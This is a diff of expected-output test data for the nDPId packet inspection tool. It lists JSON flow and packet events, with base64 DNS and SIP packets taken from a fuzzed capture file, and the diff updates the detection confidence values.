-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796801,"flow_last_seen":1120470796801,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470796801,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1120470796801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470796801,"pkt":"ADBUADRWAODtAW69CABFAABEa6EAAIARS7TAqAECwKgBAQrtADUAMFm\/yxIAAAABAAAAQAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycFwAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796801,"flow_last_seen":1120470796801,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470796801,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arp_","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796801,"flow_last_seen":1120470796801,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470796801,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arp_","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":1120470796802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470796802,"pkt":"AODtAW69ADBUADRWCABFiQBbAABAAEARtz7AqAEBwKgBAgA1Cu0ARzw7yxKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470796802,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470796802,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":200000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1120470796941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":524,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":524,"pkt_l4_len":490,"thread_ts_msec":1120470796941,"pkt":"AODtAW69ADBUADRWCABFAAH+AABAADcRii\/U8iEjwKgBAhPEE8QB6uoyU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiAyOTg1ODE0Ny00NjViMDc1MkAyOTg1ODA1MS00NjViMDdiMg0KQ1NlcTogMSBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MWI4OWJjZA0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTAwLTA0MDcyLTE3MDFiOTQxLTc3OTk0NTg0Mw0iVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyZWNlaXZlZD04MC4yMzAuMjE5LjcwO3Jwb3J0PTUwNjA7YnJhbmPYPWM5aEc0YktucCVzADc0Njg2LTQ1NWRiYmQ5MTkyLjE2OC4xLjINCldXYy1BdXRoZW50aWNhdGU6IERpZ2VzdCByZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsbm9uY2U9IjE3MDFiOTMzM2U4NzEzMmUxZjc0N2M1MDcyNjNkOTMiLG9wYXF1ZT0iMTcwMWExMzUxZjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aG09TUQ1DQpDb250ZW50LUxlbmd0aDogMA0KDQo="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":200000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":200000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":517,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470797172} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":517,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470796941,"pkt":"ADBUADRWAODtAW69CABFAACBa6MAAIARSyVzAAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXB0Y3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1120470798172,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470798172,"pkt":"ADBUABRUAODtAW69CABFAABIa6QAAIARS63AqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00561{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":519,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470187656,"flow_last_seen":1120470440137,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":1120470800175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470800175,"pkt":"ADBUADRWAODtAW69CABFAABIa6UAAIARS6zAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":520,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2167,"global_ts_msec":1120470802178} @@ -1010,17 +1010,17 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":3,"flow_last_seen":1120470806184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470806184,"pkt":"ADBUADRWAODtAW69CABFAABIa6cAAIARS6rAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1120470814186,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470814186,"pkt":"ADBUADRWAODtAW69CABFAABEa6gAAIARS63AqAECwKgBAQrvADXTMAi8HBQAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470814187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1120470814187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470814187,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKh3AgA1Cu8AR+s3HBSAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAUAAAJxAACwlsb2NhbGhvc3QA"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470814187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470814187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 01359{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":2,"flow_last_seen":1120470814189,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"thread_ts_msec":1120470814189,"pkt":"ADBUADRWAODtAW69CABFAALDa6kAAIARFMHAqAEC1PIhIxPEE8QCr1LWUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMjcxMTExNzUtNDMzMGM5ZDYxOTIuMTY4LjEuMjtycG9ydA0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MTlkYjMxNg0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz6GCkNhbGwtSUQ6IHI5ODU4MTQ3LTQ2NWIwNzUyQDI5ODU4MDUxLTQ2NWIwN2IyDQpDb250YWN0OiBwZWwgPHNpcDozNTEwXzcyM0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9N2QzNjU1OGYzRzM2NzA1MT47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDIgUkVHSVNURVINCkNvbnRlbnQtTGVuZ3RoOiAwDQpBdXRob3JpemF0aW9uOiBEaWdlc3QgdXNlcm5hbWU9InZvaTE4MDYyIixyZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsdXJpPSJzaXA6MTkyLjE2OC4xLjIiLG5vbmNlPSIxNzAxYjkzMzNlODcxMzJlN2Y3NDdjNTA3MjYzZDkzIixvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsbmM9IhIwMDAwMDAxIixyZXNwb25zZT0iMGRmOTZlYjUyOGJiNjMwYTE2ZmQwMjUyNjE4Y2YzY2IiDQpNYXgtRm9yd2FyZHM6IDcwDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQoNCg=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814334,"flow_last_seen":1120470814334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470814334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1120470814334,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470814334,"pkt":"ADBUADRWAODtAW69CABFAABIa6oAAIARS6fAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zxXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814334,"flow_last_seen":1120470814334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470814334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_s?p._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814334,"flow_last_seen":1120470814334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470814334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_s?p._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":3,"flow_last_seen":1120470814336,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":1120470814336,"pkt":"AODtAW69ADBUAFpWCABFAAFKAABAADcRiuPU8iEjwKgBAhPEE8QBNvufU0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiAyOTg1ODE0Ny00NjViMDc1MkAyOTg1YjA1MS00NjViMDdiMg0KQ1NlcTogMiBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWdLMTlkYjMxNg0KVG86IDxzaXA6MzUxMDQ3MjNAc2lyLmN5YmVyY2l0eWtkaz4NClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7cmVjZWl2ZWQ9ODAuMjMwLm4xOS43MDtycG9ydD01MDYwO2JyYW5jaD16OWhHNGJLbnAyNzExMTE3NS00MzMwYzlkNjE5Mi4xNjguMS4yDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 